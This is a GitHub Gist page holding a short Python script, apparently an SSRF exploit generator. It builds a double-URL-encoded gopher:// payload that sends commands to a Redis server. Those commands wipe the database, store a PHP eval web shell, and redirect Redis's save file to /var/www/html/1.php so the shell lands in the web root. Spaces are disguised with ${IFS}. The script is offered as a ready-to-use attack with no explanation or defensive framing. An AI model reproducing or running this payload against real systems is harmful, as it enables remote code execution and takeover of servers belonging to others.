Last active
March 29, 2022 00:33
-
-
Save OlivierLaflamme/a8bead35594577c182c3486c481bee0c to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import urllib.parse | |
protocol = "gopher://" | |
ip = "127.0.0.1" | |
port = "6788" | |
shell = "\n\n<?php eval($_POST[\"test\"]);?>\n\n" # | |
filename = "1.php" | |
path = "/var/www/html" | |
passwd = "" | |
cmd = ["flushall", | |
"set 1 {}".format(shell.replace(" ","${IFS}")), | |
"config set dir {}".format(path), | |
"config set dbfilename {}".format(filename), | |
"save", | |
"quit" | |
] | |
if passwd: | |
cmd.insert(0,"AUTH {}".format(passwd)) | |
payload = protocol + ip + ":" + port + "/_" | |
def redis_format(arr): | |
CRLF = "\r\n" | |
redis_arr = arr.split(" ") | |
cmd = "" | |
cmd += "*" + str(len(redis_arr)) | |
for x in redis_arr: | |
cmd += CRLF + "$" + str(len((x.replace("${IFS}"," ")))) + CRLF + x.replace("${IFS}"," ") | |
cmd += CRLF | |
return cmd | |
if __name__=="__main__": | |
for x in cmd: | |
payload += urllib.parse.quote(redis_format(x)) | |
# print(payload) | |
print(urllib.parse.quote(payload)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment